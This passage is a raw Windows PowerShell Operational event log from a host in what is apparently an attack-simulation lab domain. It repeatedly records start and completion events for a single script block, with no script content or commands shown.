ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472159
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472158
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472157
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472156
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472155
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472154
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472153
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472152
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472151
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472150
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472149
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472148
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472147
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472146
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472145
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472144
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472143
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472142
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472141
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472140
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472139
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472138
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472137
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472136
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472135
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472134
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472133
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472132
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472131
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472130
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472129
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472128
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472127
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472126
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472125
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472124
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472123
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472122
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472121
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472120
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472119
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472118
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472117
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472116
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472115
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472114
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472113
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472112
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472111
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472110
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472109
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472108
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472107
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472106
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472105
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
